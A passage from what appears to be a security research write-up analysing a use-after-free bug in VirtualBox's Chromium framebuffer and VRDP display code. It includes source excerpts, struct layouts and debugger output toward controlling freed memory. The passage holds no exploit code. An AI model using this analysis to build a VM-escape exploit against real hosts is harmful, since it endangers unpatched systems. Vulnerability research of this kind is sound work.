class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> DECLCALLBACK(bool) CrFbDisplayBase::entriesDestroyCb(HCR_FRAMEBUFFER hFb, HCR_FRAMEBUFFER_ENTRY hEntry, void *pvContext)  {      int rc = ((ICrFbDisplay*)(pvContext))-&gt;EntryDestroyed(hFb, hEntry);      if (!RT_SUCCESS(rc))      {          WARN((&#8220;err&#8221;));      }      return true;  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4ee095432337-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4ee095432337-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4ee095432337-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4ee095432337-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4ee095432337-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4ee095432337-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4ee095432337-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4ee095432337-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4ee095432337-9\">9<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4ee095432337-1\"><span class=\"crayon-e\">DECLCALLBACK<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">bool<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CrFbDisplayBase<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-e\">entriesDestroyCb<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">HCR_FRAMEBUFFER <\/span><span class=\"crayon-v\">hFb<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HCR_FRAMEBUFFER_ENTRY <\/span><span class=\"crayon-v\">hEntry<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">pvContext<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4ee095432337-2\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4ee095432337-3\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rc<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">ICrFbDisplay*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">pvContext<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-e\">EntryDestroyed<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">hFb<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">hEntry<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4ee095432337-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-e\">RT_SUCCESS<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">rc<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4ee095432337-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4ee095432337-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">WARN<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;err&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4ee095432337-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4ee095432337-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4ee095432337-9\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0019 seconds] -->  <\/p>\n<p>Not diving deeper, EntryDestroyed() is actually CrFbDisplayVrdp::EntryRemoved() which removes a display and frees its memory. Now you can see what&#8217;s wrong: in just one iteration of the loop of fbCleanupRemoveAllEntries() all displays are deleted and freed, and the second iteration will use already freed memory.<\/p>\n<p><b>Controlled Memory Analysis<\/b><br \/> Each display (HCR_FRAMEBUFFER_ENTRY) has a hash table where a value is a pointer to a structure describing coordinates of the display. For each display there is usually only one entry in the hash.<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7b3e582f4f4904520448\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> typedef struct CR_FRAMEBUFFER_ENTRY  {      VBOXVR_SCR_COMPOSITOR_ENTRY Entry;      RTLISTNODE Node;      uint32_t cRefs;      CR_FBENTRY_FLAGS Flags;      CRHTABLE HTable;  } CR_FRAMEBUFFER_ENTRY;    The structure is H3DORInstance defined in ConsoleVRDPServer.cpp file mentioned at the beginning of the analysis.<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4f4904520448-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4f4904520448-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4f4904520448-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4f4904520448-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4f4904520448-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4f4904520448-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4f4904520448-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4f4904520448-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4f4904520448-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4f4904520448-10\">10<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4f4904520448-1\"><span class=\"crayon-r\">typedef<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4f4904520448-2\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4f4904520448-3\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">VBOXVR_SCR_COMPOSITOR_ENTRY <\/span><span class=\"crayon-v\">Entry<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4f4904520448-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">RTLISTNODE <\/span><span class=\"crayon-v\">Node<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4f4904520448-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">uint32_t <\/span><span class=\"crayon-v\">cRefs<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4f4904520448-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">CR_FBENTRY_FLAGS <\/span><span class=\"crayon-v\">Flags<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4f4904520448-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">CRHTABLE <\/span><span class=\"crayon-v\">HTable<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4f4904520448-8\"><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CR_FRAMEBUFFER_ENTRY<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4f4904520448-9\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4f4904520448-10\"><span class=\"crayon-e\">The <\/span><span class=\"crayon-e\">structure <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">H3DORInstance <\/span><span class=\"crayon-e\">defined <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ConsoleVRDPServer<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">cpp <\/span><span class=\"crayon-e\">file <\/span><span class=\"crayon-e\">mentioned <\/span><span class=\"crayon-e\">at <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">beginning <\/span><span class=\"crayon-e\">of <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-v\">analysis<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0014 seconds] -->  <\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7b3e582f4f7194773685\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> typedef struct H3DORInstance  {      ConsoleVRDPServer *pThis;      HVRDEIMAGE hImageBitmap;      int32_t x;      int32_t y;      uint32_t w;      uint32_t h;      bool fCreated;      bool fFallback;      bool fTopDown;  } H3DORInstance;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4f7194773685-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4f7194773685-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4f7194773685-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4f7194773685-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4f7194773685-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4f7194773685-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4f7194773685-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4f7194773685-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4f7194773685-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4f7194773685-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4f7194773685-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4f7194773685-12\">12<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4f7194773685-1\"><span class=\"crayon-r\">typedef<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">H3DORInstance<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4f7194773685-2\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4f7194773685-3\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">ConsoleVRDPServer *<\/span><span class=\"crayon-v\">pThis<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4f7194773685-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">HVRDEIMAGE <\/span><span class=\"crayon-v\">hImageBitmap<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4f7194773685-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">int32<\/span><span class=\"crayon-sy\">_<\/span>t<span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4f7194773685-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">int32<\/span><span class=\"crayon-sy\">_<\/span>t<span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">y<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4f7194773685-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">uint32<\/span><span class=\"crayon-sy\">_<\/span>t<span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">w<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4f7194773685-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">uint32<\/span><span class=\"crayon-sy\">_<\/span>t<span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">h<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4f7194773685-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">bool<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fCreated<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4f7194773685-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">bool<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fFallback<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4f7194773685-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">bool<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fTopDown<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4f7194773685-12\"><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">H3DORInstance<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0016 seconds] -->  <\/p>\n<p>This is a &#8220;glue&#8221; between the high level of VRDP Server and the rest of VirtualBox. While the hash table holds just void pointers, when they are passed to ConsoleVRDPServer::* methods they are casted as H3DORInstance.<\/p>\n<p>Back to the assembly, let&#8217;s look what memory is referenced in method ConsoleVRDPServer::H3DORVisibleRegion when it&#8217;s called during normal conditions.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7b3e582f4fc579128644\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> gef\u27a4  x\/5i $pc  =&gt; 0x7fa018ec9dff:\tmov    rax,QWORD PTR [rax]     0x7fa018ec9e02:\tmov    rdi,QWORD PTR [rdi+0x8]     0x7fa018ec9e06:\tcall   QWORD PTR [rax+0x320]     0x7fa018ec9e0c:\tleave       0x7fa018ec9e0d:\tret      gef\u27a4  x\/8gx $rax-0x10  0x7fa005b8e280:\t0x0000000000000000\t0x0000000000000035  0x7fa005b8e290:\t0x00007fa010008070\t0x00007fa005bf97f0  0x7fa005b8e2a0:\t0x0000000000000000\t0x0000029800000400  0x7fa005b8e2b0:\t0x0000000000010101\t0x0000000000000065  gef\u27a4  <\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4fc579128644-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4fc579128644-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4fc579128644-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4fc579128644-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4fc579128644-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4fc579128644-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4fc579128644-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4fc579128644-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4fc579128644-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4fc579128644-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4fc579128644-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4fc579128644-12\">12<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4fc579128644-1\"><span class=\"crayon-i\">gef<\/span>\u27a4<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">pc<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4fc579128644-2\"><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fa018ec9dff<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">mov&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">QWORD <\/span><span class=\"crayon-i\">PTR<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4fc579128644-3\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7fa018ec9e02<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">mov&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rdi<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">QWORD <\/span><span class=\"crayon-i\">PTR<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rdi<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x8<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4fc579128644-4\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7fa018ec9e06<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">call&nbsp;&nbsp; <\/span><span class=\"crayon-e\">QWORD <\/span><span class=\"crayon-i\">PTR<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x320<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4fc579128644-5\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7fa018ec9e0c<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">leave<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4fc579128644-6\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7fa018ec9e0d<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">ret&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" 